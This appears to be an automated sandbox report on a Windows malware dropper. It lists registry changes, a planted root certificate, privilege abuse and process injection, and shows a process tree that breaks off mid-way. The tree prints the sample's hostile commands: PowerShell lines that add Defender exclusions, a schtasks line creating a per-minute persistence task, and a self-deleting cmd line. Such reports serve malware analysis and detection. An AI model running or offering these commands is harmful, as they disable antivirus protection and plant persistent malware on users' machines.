pid Process 3416 PING.EXE 2440 PING.EXE 3676 PING.EXE 3760 PING.EXE 1008 PING.EXE 2492 PING.EXE 3764 PING.EXE 5136 PING.EXE 1740 PING.EXE 2288 PING.EXE 3756 PING.EXE 5252 PING.EXE 3032 PING.EXE 1592 PING.EXE 5356 PING.EXE 1948 PING.EXE 6108 PING.EXE 4620 PING.EXE 1524 PING.EXE 5396 PING.EXE 2968 PING.EXE 2148 PING.EXE 3204 PING.EXE 4280 PING.EXE 2316 PING.EXE 1864 PING.EXE 3584 PING.EXE 5148 PING.EXE -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1668 netsh.exe -
NSIS installer 1 IoCs
resource yara_rule behavioral1/files/0x002e000000045084-771.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 NETFXSBS10.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString NETFXSBS10.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 5872 timeout.exe 2436 timeout.exe 1744 timeout.exe 4888 timeout.exe 5292 timeout.exe 5196 timeout.exe 1932 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ System.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ aspnet_regiis.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4872 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 YpJU1SdRN0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 YpJU1SdRN0.exe -
Runs ping.exe 1 TTPs 28 IoCs
pid Process 3764 PING.EXE 5136 PING.EXE 1524 PING.EXE 5252 PING.EXE 2148 PING.EXE 3204 PING.EXE 3584 PING.EXE 1864 PING.EXE 5148 PING.EXE 2968 PING.EXE 4280 PING.EXE 2288 PING.EXE 2492 PING.EXE 3676 PING.EXE 3760 PING.EXE 1740 PING.EXE 2440 PING.EXE 3032 PING.EXE 3416 PING.EXE 5396 PING.EXE 2316 PING.EXE 4620 PING.EXE 1948 PING.EXE 6108 PING.EXE 1008 PING.EXE 5356 PING.EXE 3756 PING.EXE 1592 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 26 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1676 schtasks.exe 1656 schtasks.exe 3060 schtasks.exe 5592 schtasks.exe 3908 schtasks.exe 5016 schtasks.exe 4624 schtasks.exe 2608 schtasks.exe 3684 schtasks.exe 6056 schtasks.exe 1916 schtasks.exe 4868 schtasks.exe 3012 schtasks.exe 5920 schtasks.exe 5040 schtasks.exe 4960 schtasks.exe 1688 schtasks.exe 3680 schtasks.exe 2432 schtasks.exe 3136 schtasks.exe 3892 schtasks.exe 3344 schtasks.exe 2900 schtasks.exe 5472 schtasks.exe 4276 schtasks.exe 3344 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2372 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 516 powershell.exe 516 powershell.exe 3372 powershell.exe 3372 powershell.exe 3932 powershell.exe 3932 powershell.exe 4492 powershell.exe 4492 powershell.exe 3880 MSBuild.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 328 DiscordSpotifyBypass.exe 3600 powershell.exe 3600 powershell.exe 3600 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 1236 powershell.exe 1236 powershell.exe 1236 powershell.exe 1464 powershell.exe 1464 powershell.exe 1464 powershell.exe 916 ._cache_System.exe 916 ._cache_System.exe 1676 NoMoreRansom.exe 1676 NoMoreRansom.exe 1676 NoMoreRansom.exe 1676 NoMoreRansom.exe 1928 major.exe 1928 major.exe 1928 major.exe 1928 major.exe 2268 app64.exe 5320 powershell.exe 5320 powershell.exe 5320 powershell.exe 2708 2164521646.exe 2708 2164521646.exe 5960 Ewpeloxttug.exe 5960 Ewpeloxttug.exe 844 powershell.exe 844 powershell.exe 844 powershell.exe 5860 pyld64.exe 5860 pyld64.exe 5544 powershell.exe 5544 powershell.exe 5544 powershell.exe 3540 powershell.exe 3540 powershell.exe 3540 powershell.exe 5884 1144032267.exe 5884 1144032267.exe 6092 powershell.exe 6092 powershell.exe 6092 powershell.exe 1184 powershell.exe 1184 powershell.exe 5884 1144032267.exe 5884 1144032267.exe 1184 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3184 Server.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 2268 app64.exe 5624 printui.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4692 4363463463464363463463463.exe Token: SeDebugPrivilege 3880 MSBuild.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeIncreaseQuotaPrivilege 516 powershell.exe Token: SeSecurityPrivilege 516 powershell.exe Token: SeTakeOwnershipPrivilege 516 powershell.exe Token: SeLoadDriverPrivilege 516 powershell.exe Token: SeSystemProfilePrivilege 516 powershell.exe Token: SeSystemtimePrivilege 516 powershell.exe Token: SeProfSingleProcessPrivilege 516 powershell.exe Token: SeIncBasePriorityPrivilege 516 powershell.exe Token: SeCreatePagefilePrivilege 516 powershell.exe Token: SeBackupPrivilege 516 powershell.exe Token: SeRestorePrivilege 516 powershell.exe Token: SeShutdownPrivilege 516 powershell.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeSystemEnvironmentPrivilege 516 powershell.exe Token: SeRemoteShutdownPrivilege 516 powershell.exe Token: SeUndockPrivilege 516 powershell.exe Token: SeManageVolumePrivilege 516 powershell.exe Token: 33 516 powershell.exe Token: 34 516 powershell.exe Token: 35 516 powershell.exe Token: 36 516 powershell.exe Token: SeDebugPrivilege 3372 powershell.exe Token: SeIncreaseQuotaPrivilege 3372 powershell.exe Token: SeSecurityPrivilege 3372 powershell.exe Token: SeTakeOwnershipPrivilege 3372 powershell.exe Token: SeLoadDriverPrivilege 3372 powershell.exe Token: SeSystemProfilePrivilege 3372 powershell.exe Token: SeSystemtimePrivilege 3372 powershell.exe Token: SeProfSingleProcessPrivilege 3372 powershell.exe Token: SeIncBasePriorityPrivilege 3372 powershell.exe Token: SeCreatePagefilePrivilege 3372 powershell.exe Token: SeBackupPrivilege 3372 powershell.exe Token: SeRestorePrivilege 3372 powershell.exe Token: SeShutdownPrivilege 3372 powershell.exe Token: SeDebugPrivilege 3372 powershell.exe Token: SeSystemEnvironmentPrivilege 3372 powershell.exe Token: SeRemoteShutdownPrivilege 3372 powershell.exe Token: SeUndockPrivilege 3372 powershell.exe Token: SeManageVolumePrivilege 3372 powershell.exe Token: 33 3372 powershell.exe Token: 34 3372 powershell.exe Token: 35 3372 powershell.exe Token: 36 3372 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeIncreaseQuotaPrivilege 3932 powershell.exe Token: SeSecurityPrivilege 3932 powershell.exe Token: SeTakeOwnershipPrivilege 3932 powershell.exe Token: SeLoadDriverPrivilege 3932 powershell.exe Token: SeSystemProfilePrivilege 3932 powershell.exe Token: SeSystemtimePrivilege 3932 powershell.exe Token: SeProfSingleProcessPrivilege 3932 powershell.exe Token: SeIncBasePriorityPrivilege 3932 powershell.exe Token: SeCreatePagefilePrivilege 3932 powershell.exe Token: SeBackupPrivilege 3932 powershell.exe Token: SeRestorePrivilege 3932 powershell.exe Token: SeShutdownPrivilege 3932 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeSystemEnvironmentPrivilege 3932 powershell.exe Token: SeRemoteShutdownPrivilege 3932 powershell.exe Token: SeUndockPrivilege 3932 powershell.exe Token: SeManageVolumePrivilege 3932 powershell.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1580 x397670.dat 5944 x397670.dat 5252 x397670.dat 396 x397670.dat 3344 x397670.dat 5776 x397670.dat 236 x397670.dat -
Suspicious use of SetWindowsHookEx 29 IoCs
pid Process 3880 MSBuild.exe 3412 PerfWatson1.exe 4440 PerfWatson1.exe 2848 PerfWatson1.exe 3924 PerfWatson1.exe 4300 PerfWatson1.exe 2320 PerfWatson1.exe 2372 EXCEL.EXE 2372 EXCEL.EXE 916 ._cache_System.exe 2372 EXCEL.EXE 2372 EXCEL.EXE 2592 PerfWatson1.exe 4828 PerfWatson1.exe 2968 PerfWatson1.exe 1716 PerfWatson1.exe 2188 PerfWatson1.exe 752 PerfWatson1.exe 5096 PerfWatson1.exe 2764 PerfWatson1.exe 5888 PerfWatson1.exe 2400 PerfWatson1.exe 700 PerfWatson1.exe 5440 PerfWatson1.exe 3080 PerfWatson1.exe 2096 PerfWatson1.exe 6140 PerfWatson1.exe 5552 PerfWatson1.exe 3168 PerfWatson1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4692 wrote to memory of 772 4692 4363463463464363463463463.exe 85 PID 4692 wrote to memory of 772 4692 4363463463464363463463463.exe 85 PID 4692 wrote to memory of 772 4692 4363463463464363463463463.exe 85 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 772 wrote to memory of 3880 772 cudo.exe 87 PID 3880 wrote to memory of 516 3880 MSBuild.exe 91 PID 3880 wrote to memory of 516 3880 MSBuild.exe 91 PID 3880 wrote to memory of 516 3880 MSBuild.exe 91 PID 3880 wrote to memory of 3372 3880 MSBuild.exe 94 PID 3880 wrote to memory of 3372 3880 MSBuild.exe 94 PID 3880 wrote to memory of 3372 3880 MSBuild.exe 94 PID 3880 wrote to memory of 3932 3880 MSBuild.exe 96 PID 3880 wrote to memory of 3932 3880 MSBuild.exe 96 PID 3880 wrote to memory of 3932 3880 MSBuild.exe 96 PID 3880 wrote to memory of 4492 3880 MSBuild.exe 98 PID 3880 wrote to memory of 4492 3880 MSBuild.exe 98 PID 3880 wrote to memory of 4492 3880 MSBuild.exe 98 PID 3880 wrote to memory of 1916 3880 MSBuild.exe 100 PID 3880 wrote to memory of 1916 3880 MSBuild.exe 100 PID 3880 wrote to memory of 1916 3880 MSBuild.exe 100 PID 4692 wrote to memory of 1636 4692 4363463463464363463463463.exe 105 PID 4692 wrote to memory of 1636 4692 4363463463464363463463463.exe 105 PID 4692 wrote to memory of 1636 4692 4363463463464363463463463.exe 105 PID 4692 wrote to memory of 3652 4692 4363463463464363463463463.exe 106 PID 4692 wrote to memory of 3652 4692 4363463463464363463463463.exe 106 PID 4692 wrote to memory of 3652 4692 4363463463464363463463463.exe 106 PID 4692 wrote to memory of 1472 4692 4363463463464363463463463.exe 107 PID 4692 wrote to memory of 1472 4692 4363463463464363463463463.exe 107 PID 4692 wrote to memory of 1472 4692 4363463463464363463463463.exe 107 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 1472 wrote to memory of 4008 1472 legas.exe 108 PID 4008 wrote to memory of 4616 4008 MSBuild.exe 111 PID 4008 wrote to memory of 4616 4008 MSBuild.exe 111 PID 4008 wrote to memory of 3116 4008 MSBuild.exe 112 PID 4008 wrote to memory of 3116 4008 MSBuild.exe 112 PID 4692 wrote to memory of 1976 4692 4363463463464363463463463.exe 114 PID 4692 wrote to memory of 1976 4692 4363463463464363463463463.exe 114 PID 4692 wrote to memory of 1976 4692 4363463463464363463463463.exe 114 PID 1976 wrote to memory of 3420 1976 crypteda.exe 115 PID 1976 wrote to memory of 3420 1976 crypteda.exe 115 PID 1976 wrote to memory of 3420 1976 crypteda.exe 115 PID 1976 wrote to memory of 4220 1976 crypteda.exe 117 PID 1976 wrote to memory of 4220 1976 crypteda.exe 117 PID 1976 wrote to memory of 4220 1976 crypteda.exe 117 PID 4692 wrote to memory of 4072 4692 4363463463464363463463463.exe 122 PID 4692 wrote to memory of 4072 4692 4363463463464363463463463.exe 122 PID 4692 wrote to memory of 4072 4692 4363463463464363463463463.exe 122 PID 4692 wrote to memory of 3960 4692 4363463463464363463463463.exe 124 PID 4692 wrote to memory of 3960 4692 4363463463464363463463463.exe 124 PID 4692 wrote to memory of 1284 4692 4363463463464363463463463.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svcsys'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svcsys'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4492
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svcsys" /tr "C:\ProgramData\svcsys"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\7777.exe"C:\Users\Admin\AppData\Local\Temp\Files\7777.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1636 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\j86piuq9.exe"C:\Users\Admin\AppData\Local\Temp\Files\j86piuq9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3652 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:5360
-
-
C:\Windows\Boot\PCAT\memtest.exe"C:\Windows\Boot\PCAT\memtest.exe"4⤵PID:4628
-
-
C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe"C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe" & rd /s /q "C:\ProgramData\JKJKJJDBKEGI" & exit5⤵
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5292
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Users\Admin\AppData\Roaming\sgGWFhcaHD.exe"C:\Users\Admin\AppData\Roaming\sgGWFhcaHD.exe"5⤵
- Executes dropped EXE
PID:4616
-
-
C:\Users\Admin\AppData\Roaming\Njx11RiiEL.exe"C:\Users\Admin\AppData\Roaming\Njx11RiiEL.exe"5⤵
- Executes dropped EXE
PID:3116
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 2924⤵
- Program crash
PID:1248
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypteda.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1976 -
